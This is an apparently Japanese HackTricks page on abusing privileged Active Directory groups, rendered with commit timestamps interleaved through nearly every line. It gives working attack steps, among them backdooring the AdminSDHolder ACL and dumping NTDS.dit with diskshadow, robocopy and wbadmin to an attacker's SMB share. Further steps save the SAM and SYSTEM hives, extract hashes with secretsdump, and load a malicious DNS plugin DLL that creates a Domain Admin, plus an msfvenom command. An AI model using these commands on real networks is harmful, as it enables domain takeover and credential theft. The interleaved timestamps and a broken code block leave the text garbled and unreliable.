2023-07-07 23:42:27 +00:00
# 特権グループ
2022-04-28 16:01:33 +00:00
2024-07-19 10:21:08 +00:00
{% hint style="success" %}
AWSハッキングを学び、実践する: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCPハッキングを学び、実践する: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 10:21:08 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 10:21:08 +00:00
< summary > HackTricksをサポートする< / summary >
2024-01-02 22:36:59 +00:00
2024-07-19 10:21:08 +00:00
* [**サブスクリプションプラン** ](https://github.com/sponsors/carlospolop )を確認してください!
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**をフォローしてください。**
* **ハッキングトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 10:21:08 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-11-09 13:28:55 +00:00
< figure > < img src = "/.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
[**Trickest** ](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection )を使用して、世界で最も高度なコミュニティツールによって強化された**ワークフローを簡単に構築し、自動化**します。\
今すぐアクセスを取得:
{% embed url="https://trickest.com/?utm_source=hacktricks& utm_medium=banner& utm_campaign=ppc& utm_content=command-injection" %}
2024-07-19 10:21:08 +00:00
## 管理権限を持つよく知られたグループ
2020-07-15 15:43:14 +00:00
2024-07-19 10:21:08 +00:00
* **管理者**
* **ドメイン管理者**
* **エンタープライズ管理者**
2020-07-15 15:43:14 +00:00
2024-02-08 03:59:37 +00:00
## アカウントオペレーター
2020-07-15 15:43:14 +00:00
2024-07-19 10:21:08 +00:00
このグループは、ドメイン上で管理者でないアカウントやグループを作成する権限を持っています。さらに、ドメインコントローラー( DC) へのローカルログインを可能にします。
2022-10-05 21:11:58 +00:00
2024-07-19 10:21:08 +00:00
このグループのメンバーを特定するには、次のコマンドが実行されます:
2022-10-05 21:11:58 +00:00
```powershell
Get-NetGroupMember -Identity "Account Operators" -Recurse
```
2024-07-19 10:21:08 +00:00
新しいユーザーの追加が許可されており、DC01へのローカルログインも可能です。
2022-10-05 21:11:58 +00:00
2024-07-19 10:21:08 +00:00
## AdminSDHolder グループ
2022-10-05 21:11:58 +00:00
2024-07-19 10:21:08 +00:00
**AdminSDHolder** グループのアクセス制御リスト (ACL) は重要であり、Active Directory 内のすべての「保護されたグループ」、特に高特権グループの権限を設定します。このメカニズムは、無許可の変更を防ぐことによって、これらのグループのセキュリティを確保します。
2022-10-05 21:11:58 +00:00
2024-07-19 10:21:08 +00:00
攻撃者は、**AdminSDHolder** グループの ACL を変更し、標準ユーザーに完全な権限を付与することでこれを悪用する可能性があります。これにより、そのユーザーはすべての保護されたグループに対して完全な制御を持つことになります。このユーザーの権限が変更または削除された場合、システムの設計により、1時間以内に自動的に復元されます。
2020-07-15 15:43:14 +00:00
2024-07-19 10:21:08 +00:00
メンバーを確認し、権限を変更するためのコマンドには次のものが含まれます:
2022-10-05 21:11:58 +00:00
```powershell
Get-NetGroupMember -Identity "AdminSDHolder" -Recurse
2020-07-15 15:43:14 +00:00
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}
```
2024-07-19 10:21:08 +00:00
スクリプトは復元プロセスを迅速化するために利用可能です: [Invoke-ADSDPropagation.ps1 ](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1 )。
2020-07-15 15:43:14 +00:00
2024-07-19 10:21:08 +00:00
詳細については、[ired.team](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence)を訪問してください。
2020-07-15 15:43:14 +00:00
2024-07-19 10:21:08 +00:00
## AD リサイクル ビン
2020-07-15 15:43:14 +00:00
2024-07-19 10:21:08 +00:00
このグループのメンバーシップは、削除された Active Directory オブジェクトの読み取りを可能にし、機密情報を明らかにする可能性があります:
2022-10-05 21:11:58 +00:00
```bash
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
```
2024-02-08 03:59:37 +00:00
### ドメインコントローラーアクセス
2020-07-15 15:43:14 +00:00
2024-07-19 10:21:08 +00:00
DC上のファイルへのアクセスは、ユーザーが`Server Operators`グループの一部でない限り制限されています。これにより、アクセスレベルが変更されます。
2020-07-15 15:43:14 +00:00
2024-02-08 03:59:37 +00:00
### 特権昇格
2020-07-15 15:43:14 +00:00
2024-07-19 10:21:08 +00:00
Sysinternalsの`PsService`または`sc`を使用することで、サービスの権限を検査および変更できます。たとえば、`Server Operators`グループは特定のサービスに対して完全な制御を持ち、任意のコマンドの実行や特権昇格を可能にします。
2024-02-08 03:59:37 +00:00
```cmd
2022-10-03 21:39:01 +00:00
C:\> .\PsService.exe security AppReadiness
```
2024-07-19 10:21:08 +00:00
このコマンドは、`Server Operators`が完全なアクセス権を持ち、特権を昇格させるためにサービスを操作できることを明らかにします。
2020-07-15 15:43:14 +00:00
2024-11-09 13:28:55 +00:00
## バックアップオペレーター
2022-10-03 20:20:19 +00:00
2024-07-19 10:21:08 +00:00
`Backup Operators` グループのメンバーシップは、`SeBackup`および`SeRestore`特権により、`DC01`ファイルシステムへのアクセスを提供します。これらの特権により、明示的な権限がなくても、`FILE_FLAG_BACKUP_SEMANTICS`フラグを使用してフォルダのトラバーサル、リスト表示、およびファイルコピー機能が可能になります。このプロセスには特定のスクリプトを利用する必要があります。
2022-10-03 20:20:19 +00:00
2024-07-19 10:21:08 +00:00
グループメンバーをリストするには、次を実行します:
2022-10-05 21:11:58 +00:00
```powershell
Get-NetGroupMember -Identity "Backup Operators" -Recurse
```
2024-02-08 03:59:37 +00:00
### ローカル攻撃
2024-07-19 10:21:08 +00:00
これらの特権をローカルで利用するために、以下の手順が実行されます:
2024-02-08 03:59:37 +00:00
2024-07-19 10:21:08 +00:00
1. 必要なライブラリをインポートする:
2022-10-03 20:20:19 +00:00
```bash
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
2024-02-08 03:59:37 +00:00
```
2024-07-19 10:21:08 +00:00
2. `SeBackupPrivilege` を有効にして確認する:
2024-02-08 03:59:37 +00:00
```bash
2022-10-03 20:20:19 +00:00
Set-SeBackupPrivilege
Get-SeBackupPrivilege
2024-02-08 03:59:37 +00:00
```
2024-07-19 10:21:08 +00:00
3. 制限されたディレクトリからファイルにアクセスし、コピーします。例えば:
2024-02-08 03:59:37 +00:00
```bash
2022-10-03 20:20:19 +00:00
dir C:\Users\Administrator\
2024-02-08 03:59:37 +00:00
Copy-FileSeBackupPrivilege C:\Users\Administrator\report.pdf c:\temp\x.pdf -Overwrite
2022-10-03 20:20:19 +00:00
```
2023-07-07 23:42:27 +00:00
### AD攻撃
2022-10-03 20:20:19 +00:00
2024-11-09 13:28:55 +00:00
ドメインコントローラーのファイルシステムへの直接アクセスは、ドメインユーザーとコンピューターのすべてのNTLMハッシュを含む`NTDS.dit`データベースの盗難を可能にします。
2020-07-15 15:43:14 +00:00
2024-02-08 03:59:37 +00:00
#### diskshadow.exeの使用
2022-10-03 20:20:19 +00:00
2024-07-19 10:21:08 +00:00
1. `C` ドライブのシャドウコピーを作成します:
2024-02-08 03:59:37 +00:00
```cmd
2022-10-03 20:20:19 +00:00
diskshadow.exe
2024-02-08 03:59:37 +00:00
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
begin backup
add volume C: alias cdrive
create
expose %cdrive% F:
end backup
exit
```
2. シャドウコピーから `NTDS.dit` をコピーします:
```cmd
2022-10-03 20:20:19 +00:00
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
```
2024-07-19 10:21:08 +00:00
代わりに、ファイルコピーには `robocopy` を使用します:
2024-02-08 03:59:37 +00:00
```cmd
2022-10-03 20:20:19 +00:00
robocopy /B F:\Windows\NTDS .\ntds ntds.dit
```
2024-07-19 10:21:08 +00:00
3. ハッシュ取得のために `SYSTEM` と `SAM` を抽出する:
2024-02-08 03:59:37 +00:00
```cmd
2022-10-03 20:20:19 +00:00
reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV
```
2024-11-09 13:28:55 +00:00
4. `NTDS.dit` からすべてのハッシュを取得する:
2022-10-03 20:20:19 +00:00
```shell-session
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
```
2024-02-08 03:59:37 +00:00
#### wbadmin.exeの使用
2023-11-05 23:28:28 +00:00
2024-07-19 10:21:08 +00:00
1. 攻撃者のマシンでSMBサーバー用のNTFSファイルシステムを設定し、ターゲットマシンにSMB資格情報をキャッシュします。
2. `wbadmin.exe` を使用してシステムバックアップと`NTDS.dit`の抽出を行います:
2024-02-08 03:59:37 +00:00
```cmd
2023-11-05 23:28:28 +00:00
net use X: \\< AttackIP > \sharename /user:smbuser password
echo "Y" | wbadmin start backup -backuptarget:\\< AttackIP > \sharename -include:c:\windows\ntds
wbadmin get versions
2024-02-08 03:59:37 +00:00
echo "Y" | wbadmin start recovery -version:< date-time > -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
2023-11-05 23:28:28 +00:00
```
2024-07-19 10:21:08 +00:00
実践的なデモについては、[DEMO VIDEO WITH IPPSEC](https://www.youtube.com/watch?v=IfCysW0Od8w& t=2610s)を参照してください。
2023-11-05 23:28:28 +00:00
2022-10-03 21:39:01 +00:00
## DnsAdmins
2020-07-15 15:43:14 +00:00
2024-11-09 13:28:55 +00:00
**DnsAdmins**グループのメンバーは、DNSサーバー( 通常はドメインコントローラー上にホストされている) でSYSTEM権限を持つ任意のDLLをロードするためにその権限を悪用できます。この能力は、重大な悪用の可能性をもたらします。
2020-07-15 15:43:14 +00:00
2024-07-19 10:21:08 +00:00
DnsAdminsグループのメンバーをリストするには、次のコマンドを使用します:
2022-10-05 21:11:58 +00:00
```powershell
Get-NetGroupMember -Identity "DnsAdmins" -Recurse
```
2024-07-19 10:21:08 +00:00
### 任意のDLLを実行する
2022-10-05 21:11:58 +00:00
2024-11-09 13:28:55 +00:00
メンバーは、次のようなコマンドを使用して、DNSサーバーに任意のDLL( ローカルまたはリモート共有から) をロードさせることができます:
2024-02-08 03:59:37 +00:00
```powershell
2020-07-15 15:43:14 +00:00
dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.dll
dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-DLL.dll
2024-02-08 03:59:37 +00:00
An attacker could modify the DLL to add a user to the Domain Admins group or execute other commands with SYSTEM privileges. Example DLL modification and msfvenom usage:
2020-07-15 15:43:14 +00:00
```
2024-02-08 03:59:37 +00:00
2020-07-15 15:43:14 +00:00
```c
2024-02-08 03:59:37 +00:00
// Modify DLL to add user
2020-07-15 15:43:14 +00:00
DWORD WINAPI DnsPluginInitialize(PVOID pDnsAllocateFunction, PVOID pDnsFreeFunction)
{
2023-07-07 23:42:27 +00:00
system("C:\\Windows\\System32\\net.exe user Hacker T0T4llyrAndOm... /add /domain");
system("C:\\Windows\\System32\\net.exe group \"Domain Admins\" Hacker /add /domain");
2020-07-15 15:43:14 +00:00
}
```
2024-02-08 03:59:37 +00:00
2022-10-03 21:39:01 +00:00
```bash
2024-02-08 03:59:37 +00:00
// Generate DLL with msfvenom
2022-10-03 21:39:01 +00:00
msfvenom -p windows/x64/exec cmd='net group "domain admins" < username > /add /domain' -f dll -o adduser.dll
```
2024-07-19 10:21:08 +00:00
DNSサービスを再起動する( 追加の権限が必要な場合があります) は、DLLをロードするために必要です:
2020-07-15 15:43:14 +00:00
```csharp
sc.exe \\dc01 stop dns
sc.exe \\dc01 start dns
```
2024-07-19 10:21:08 +00:00
For more details on this attack vector, refer to ired.team.
2022-10-03 21:39:01 +00:00
#### Mimilib.dll
2024-07-19 10:21:08 +00:00
mimilib.dllを使用してコマンド実行を行うことも可能であり、特定のコマンドやリバースシェルを実行するように変更できます。[この投稿を確認してください](https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html) さらなる情報のために。
2022-10-03 21:39:01 +00:00
2024-07-19 10:21:08 +00:00
### WPAD Record for MitM
DnsAdminsは、グローバルクエリブロックリストを無効にした後にWPADレコードを作成することで、DNSレコードを操作してMan-in-the-Middle (MitM)攻撃を実行できます。ResponderやInveighのようなツールを使用して、スプーフィングやネットワークトラフィックのキャプチャが可能です。
2022-10-03 21:39:01 +00:00
2024-07-19 10:21:08 +00:00
### Event Log Readers
メンバーはイベントログにアクセスでき、平文のパスワードやコマンド実行の詳細など、機密情報を見つける可能性があります。
2022-10-03 21:39:01 +00:00
```powershell
2024-02-08 03:59:37 +00:00
# Get members and search logs for sensitive information
2022-10-05 21:11:58 +00:00
Get-NetGroupMember -Identity "Event Log Readers" -Recurse
2024-02-08 03:59:37 +00:00
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}
2022-10-03 21:39:01 +00:00
```
2024-02-08 03:59:37 +00:00
## Exchange Windows Permissions
2024-07-19 10:21:08 +00:00
このグループは、ドメインオブジェクトのDACLを変更でき、DCSync権限を付与する可能性があります。このグループを利用した特権昇格の手法は、Exchange-AD-Privesc GitHubリポジトリに詳述されています。
2022-10-05 22:52:18 +00:00
```powershell
2024-02-08 03:59:37 +00:00
# List members
2022-10-05 22:52:18 +00:00
Get-NetGroupMember -Identity "Exchange Windows Permissions" -Recurse
```
2024-07-19 10:21:08 +00:00
## Hyper-V 管理者
Hyper-V 管理者は Hyper-V への完全なアクセス権を持ち、これを利用して仮想化されたドメインコントローラーを制御することができます。これには、ライブ DC のクローン作成や NTDS.dit ファイルから NTLM ハッシュを抽出することが含まれます。
2022-10-03 21:39:01 +00:00
2024-07-19 10:21:08 +00:00
### 悪用の例
Firefox の Mozilla Maintenance Service は、Hyper-V 管理者によって SYSTEM としてコマンドを実行するために悪用される可能性があります。これには、保護された SYSTEM ファイルへのハードリンクを作成し、それを悪意のある実行可能ファイルに置き換えることが含まれます。
2022-10-03 21:39:01 +00:00
```bash
2024-02-08 03:59:37 +00:00
# Take ownership and start the service
takeown /F C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
sc.exe start MozillaMaintenance
2022-10-03 21:39:01 +00:00
```
2024-11-09 13:28:55 +00:00
Note: ハードリンクの悪用は、最近のWindowsアップデートで軽減されています。
2024-07-19 10:21:08 +00:00
2023-07-07 23:42:27 +00:00
## 組織管理
2022-10-05 22:52:18 +00:00
2024-11-09 13:28:55 +00:00
**Microsoft Exchange**が展開されている環境では、**Organization Management**という特別なグループが重要な権限を持っています。このグループは、**すべてのドメインユーザーのメールボックスにアクセスする**特権を持ち、**「Microsoft Exchange Security Groups」**組織単位( OU) に対して**完全な制御**を維持しています。この制御には、特権昇格に悪用される可能性のある**`Exchange Windows Permissions`**グループが含まれます。
2022-10-05 21:11:58 +00:00
2024-07-19 10:21:08 +00:00
### 特権の悪用とコマンド
2022-10-05 21:11:58 +00:00
2024-07-19 10:21:08 +00:00
#### プリントオペレーター
**Print Operators**グループのメンバーは、**`SeLoadDriverPrivilege`**を含むいくつかの特権を持っており、これにより**ドメインコントローラーにローカルでログオン**し、シャットダウンし、プリンターを管理することができます。これらの特権を悪用するには、特に**`SeLoadDriverPrivilege`**が昇格されていないコンテキストで表示されない場合、ユーザーアカウント制御( UAC) をバイパスする必要があります。
2022-10-05 21:11:58 +00:00
2024-11-09 13:28:55 +00:00
このグループのメンバーをリストするには、次のPowerShellコマンドを使用します:
2022-10-05 21:11:58 +00:00
```powershell
Get-NetGroupMember -Identity "Print Operators" -Recurse
```
2024-07-19 10:21:08 +00:00
For more detailed exploitation techniques related to ** `SeLoadDriverPrivilege` **, one should consult specific security resources.
2024-02-09 01:39:37 +00:00
#### リモートデスクトップユーザー
2024-07-19 10:21:08 +00:00
このグループのメンバーは、リモートデスクトッププロトコル( RDP) を介してPCにアクセスすることが許可されています。これらのメンバーを列挙するために、PowerShellコマンドが利用可能です:
2022-10-05 21:11:58 +00:00
```powershell
Get-NetGroupMember -Identity "Remote Desktop Users" -Recurse
Get-NetLocalGroupMember -ComputerName < pc name > -GroupName "Remote Desktop Users"
```
2024-07-19 10:21:08 +00:00
さらにRDPを悪用するための洞察は、専用のpentestingリソースにあります。
2022-10-05 21:11:58 +00:00
2024-02-08 03:59:37 +00:00
#### リモート管理ユーザー
2024-11-09 13:28:55 +00:00
メンバーは**Windows Remote Management (WinRM)**を介してPCにアクセスできます。これらのメンバーの列挙は、以下の方法で達成されます:
2022-10-05 21:11:58 +00:00
```powershell
Get-NetGroupMember -Identity "Remote Management Users" -Recurse
Get-NetLocalGroupMember -ComputerName < pc name > -GroupName "Remote Management Users"
```
2024-07-19 10:21:08 +00:00
**WinRM**に関連するエクスプロイト技術については、特定のドキュメントを参照する必要があります。
2024-02-08 03:59:37 +00:00
#### サーバーオペレーター
2024-11-09 13:28:55 +00:00
このグループは、ドメインコントローラー上でさまざまな構成を実行する権限を持っており、バックアップおよび復元の権限、システム時間の変更、システムのシャットダウンが含まれます。メンバーを列挙するためのコマンドは次のとおりです:
2022-10-05 21:11:58 +00:00
```powershell
Get-NetGroupMember -Identity "Server Operators" -Recurse
```
2024-07-19 10:21:08 +00:00
## References <a href="#references" id="references"></a>
2024-02-08 03:59:37 +00:00
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges ](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges )
* [https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/ ](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/ )
* [https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-b--privileged-accounts-and-groups-in-active-directory ](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-b--privileged-accounts-and-groups-in-active-directory )
* [https://docs.microsoft.com/en-us/windows/desktop/secauthz/enabling-and-disabling-privileges-in-c-- ](https://docs.microsoft.com/en-us/windows/desktop/secauthz/enabling-and-disabling-privileges-in-c-- )
* [https://adsecurity.org/?p=3658 ](https://adsecurity.org/?p=3658 )
* [http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ ](http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ )
* [https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/ ](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/ )
* [https://rastamouse.me/2019/01/gpo-abuse-part-1/ ](https://rastamouse.me/2019/01/gpo-abuse-part-1/ )
* [https://github.com/killswitch-GUI/HotLoad-Driver/blob/master/NtLoadDriver/EXE/NtLoadDriver-C%2B%2B/ntloaddriver.cpp#L13 ](https://github.com/killswitch-GUI/HotLoad-Driver/blob/master/NtLoadDriver/EXE/NtLoadDriver-C%2B%2B/ntloaddriver.cpp#L13 )
* [https://github.com/tandasat/ExploitCapcom ](https://github.com/tandasat/ExploitCapcom )
* [https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp ](https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp )
* [https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys ](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys )
* [https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e ](https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e )
* [https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html ](https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html )
2022-04-28 16:01:33 +00:00
2024-11-09 13:28:55 +00:00
< figure > < img src = "/.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
[**Trickest** ](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection )を使用して、世界で最も高度なコミュニティツールによって駆動される**ワークフローを簡単に構築し、自動化**します。\
今すぐアクセスを取得:
{% embed url="https://trickest.com/?utm_source=hacktricks& utm_medium=banner& utm_campaign=ppc& utm_content=command-injection" %}
2024-07-19 10:21:08 +00:00
{% hint style="success" %}
2024-11-09 13:28:55 +00:00
AWSハッキングを学び、練習する: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCPハッキングを学び、練習する: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 10:21:08 +00:00
< details >
2024-01-02 22:36:59 +00:00
2024-07-19 10:21:08 +00:00
< summary > HackTricksをサポートする< / summary >
2022-04-28 16:01:33 +00:00
2024-07-19 10:21:08 +00:00
* [**サブスクリプションプラン** ](https://github.com/sponsors/carlospolop )を確認してください!
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**をフォローしてください。**
2024-11-09 13:28:55 +00:00
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 10:21:08 +00:00
{% endhint %}